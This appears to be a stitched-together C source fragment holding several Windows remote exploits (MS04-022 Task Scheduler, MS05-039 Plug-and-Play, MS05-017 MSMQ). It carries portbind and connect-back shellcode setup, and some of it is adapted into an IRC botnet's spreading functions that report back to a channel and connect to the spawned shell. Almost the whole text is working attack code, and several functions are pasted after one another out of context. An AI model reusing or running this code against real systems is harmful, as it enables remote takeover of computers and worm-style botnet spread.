int
main(int argc, char **argv)
{
unsigned short strlen;
unsigned short port;
unsigned long ip, sc;
FILE *fp, *fp2;
printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
if (argc < 4) usage(argv[0]);
sc = atoi(argv[2]);
if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);
fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can\'t create file: %s\n", argv[1]);
exit(0);
}
/* header & garbage */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fseek(fp, 39*16, SEEK_SET);
port = atoi(argv[3]);
printf("[*] Shellcode: ");
if (sc == 1) {
SET_PORTBIND_PORT(portbindsc, htons(port));
printf("Portbind, port = %u\n", port);
fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
}
else {
ip = inet_addr(argv[4]);
SET_CONNECTBACK_IP(connectbacksc, ip);
SET_CONNECTBACK_PORT(connectbacksc, htons(port));
printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
}
printf("[*] Generate file: %s\n", argv[1]);
fwrite(&strlen, 1, 2, fp);
fclose(fp);
return 0;
}
BOOL pnp(EXINFO exinfo)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
char buffer[IRCLINE];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
// printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
// printf("\t Universal Exploit + no crash shellcode\n\n\n");
// printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
// if (exinfo.ip < 3) {
// printf("%s <host> <bind port>\n", argv[0]);
// exit(0);
// return false;
// }
if ((he = gethostbyname(exinfo.ip)) == NULL) {
// printf("[-] Unable to resolve %s\n", argv[1]);
// exit(0);
return false;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
// printf("[-] socket failed\n");
// exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
//printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
//printf("\n[-] connect failed\n");
//exit(0);
return false;
}
// printf("ok\n");
// printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
//printf("\n[-] failed\n");
// exit(0);
return false;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
convert_name((char*)ptr, (char*)tmp);
smblen = strlen((char*)tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {
// printf("\n[-] send failed\n");
// _snprintf(buffer, sizeof(buffer), "send failed");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
//_snprintf(buffer, sizeof(buffer), "failed");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// exit(0);
return false;
}
//printf("ok\n");
// printf("[*] bind pipe...");
// _snprintf(buffer, sizeof(buffer), "Bind Pipe");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
//printf("\n[-] send failed\n");
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
// printf("\n[-] send failed\n");
//_snprintf(buffer, sizeof(buffer), "send failed");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
//exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
//printf("ok\n");
// printf("[*] sending crafted packet...");
// _snprintf(buffer, sizeof(buffer), "sending craffted packet");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = xport;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, (char*)packet, 2196, 0) < 0) {
// printf("\n[-] send failed\n");
//_snprintf(buffer, sizeof(buffer), "send failed");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
//exit(0);
return false;
}
// printf("ok\n");
// printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
// _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// recv(sockfd, recvbuf, 4096, 0);
exploit[exinfo.exploit].stats++;
if (ConnectShell2(exinfo))
return true;
return false;
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t Universal Exploit + no crash shellcode\n\n");
printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n");
printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
if (argc < 3) {
printf("%s <host> <bind port>\n", argv[0]);
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed\n");
exit(0);
}
printf("ok\n");
printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] bind pipe...");
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
printf("ok\n");
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
int
main (int argc, char **argv)
{
unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
unsigned char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
struct hostent *he;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
#ifdef _WIN32
WSADATA wsa;
#endif
printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
if (argc < 5) {
printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
printf("\nMSMQ ports: 2103, 2105, 2107\n");
printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
exit(0);
}
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] create socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons((short)atoi(argv[2]));
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed!\n");
exit(0);
}
printf("OK\n");
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (send(sockfd, packet, cnt, 0) == -1) {
printf("[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) {
printf("[-] recv failed\n");
exit(0);
}
free(packet);
printf("[*] Attacking...");
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
// Remote NetBIOS name
convert_name(ptr, argv[3]);
ptr += strlen(argv[3])*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
// offsets
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
// shellcode
bindport = (unsigned short)atoi(argv[4]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
if (argc == 6) cpkt = atoi(argv[5]);
while (cpkt--) {
printf(".");
if (send(sockfd, buff, 4172, 0) == -1) {
printf("\n[-] send failed\n");
exit(0);
}
}
printf(" OK\n");
return 0;
}
BOOL
ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
int len;
char buffer[IRCLINE];
SOCKET sockfd;
int pport = 7777;
BOOL success = FALSE;
SOCKADDR_IN their_addr;
memset(&their_addr, 0, sizeof(their_addr));
//struct sockaddr_in addr;
char recvbuf[4096];
// struct hostent *he;
unsigned short smblen;
unsigned short bindport;
char tmp[1024];
char packet[4096];
char *ptr;
/* WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);*/
//printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
//printf("\t Universal Exploit + no crash shellcode\n\n\n");
//printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
/* if (argc < 3) {
printf("%s <host> <bind port>\n", argv[0]);
exit(0);
}
*/
/* if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
*/
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
return FALSE;
}
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/*addr.sin_family = AF_INET;
addr.sin_port = fhtons((unsigned short)exinfo.port);
addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
memset(&(their_addr.sin_zero), '\0', 8);
//printf("\n[*] connecting to %s:445...", argv[1]);
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
return FALSE;
}
//printf("ok\n");
//printf("[*] null session...");
if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
return FALSE;
}
if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
//printf("ok\n");
//printf("[*] bind pipe...");
if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
//printf("ok\n");
//printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi((const char *)pport);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, packet, 2196, 0) < 0) {
return FALSE;
}
// printf("ok\n");
// printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
frecv(sockfd, recvbuf, 4096, 0);
Sleep(300);
fclosesocket(sockfd);
if (ConnectShell2(exinfo)) {
if(!exinfo.silent)
{
_snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
}
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
BOOL MSMQ(EXINFO exinfo)
{
if(!fNetWkstaGetInfo) { return FALSE; }
char* cname;
char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
return FALSE;
addr.sin_family = AF_INET;
addr.sin_port = fhtons(exinfo.port);
addr.sin_addr.s_addr = finet_addr(exinfo.ip);
memset(&(addr.sin_zero), '\0', 8);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
return FALSE;
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) { free(packet); return FALSE; }
cname = GetRemoteComputerName(exinfo.ip);
if(strlen(cname) == 0) { return FALSE; }
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
msmq_convert_name(ptr, cname);
ptr += strlen(cname)*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
int bp = brandom(1337,65535);
bindport = (unsigned short)bp;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS == OS_WIN2K) cpkt = 8;
if(TargetOS == OS_WINXP) cpkt = 1;
while (cpkt--) {
if (fsend(sockfd, buff, 4172, 0) == -1) {
return FALSE;
}
}
fclosesocket(sockfd);
Sleep(500);
free(buff);
if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
return FALSE;
}
